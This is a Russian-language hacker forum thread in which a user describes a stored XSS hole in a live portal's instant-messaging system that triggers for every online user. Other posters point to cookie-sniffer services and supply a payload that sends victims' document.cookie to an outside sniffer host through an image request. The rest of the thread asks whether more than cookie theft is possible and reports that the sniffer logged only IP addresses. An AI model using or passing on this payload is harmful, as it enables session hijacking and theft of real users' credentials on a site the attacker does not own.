|
Что можно сделать?
И так есть портал , в нем есть сам саит, чат, форум, и системка мгновенных сообщений всем юзерам он-лаина, она на php ... так вот в неи есть активная xss , после добавления сообщения с хсс , алерт вызывается у всех пользователей что он-лаин. Сам скрипт был такои:
Код:
"><script>alert(document.cookie);</script> |
Я только сейчас понимаю как это тяжело каждый раз объяснять, что нужно делать в XSS.
Вообщем, в поиске на а-чате или Googool забей "XSS снифер". Там посмотри - должен сам разобраться. |
Цитата:
Вот те мануал http://antichat.ru/sniff/ Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg Лог сниффера: http://antichat.ru/sniff/log.php Можешь и персональный юзать например в http://s.netsec.ru Далее в алерт впихаешь сниффа + документ кукис ... чтоб заполучить кукисы жертвы Например: Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> |
Спасиб за инфу!) Но я хотел бы знать, кроме "утаскивания" куков, можно ли чтонить еще сделать?
|
DDos Имхо можно сделать!
шутка :D Вот тебе еще один мануал открй для себя многое http://forum.antichat.ru/thread20140.html |
Цитата:
Разъясню что есть, есть портал на котором есть такая штука как мгновенные сообщения пользователям , что на саите , это сообщение открывается в небольшом маленьком php окошке ... но это окошко никаких куков не содержит ... я отправлял сообщение со скриптом на снифер ... но в логе снифера отображаются только ИПы и откуда они были направлены (тоесть с адреса того окна) Так что утащить куки не получается ... :confused: |
Цитата:
Кстати в мануале написано где и как можно использовать активную или пассивную XSS .. больше вариантов нет по использыванию XSS |
Говорим спасибо Electro за ответ, а тему закрываем =) Ибо больше чем кража кук ты ничего не сделаешь.Закрыто.
P.S. а сам уезжаю отдыхать =) |
| Время: 18:50 |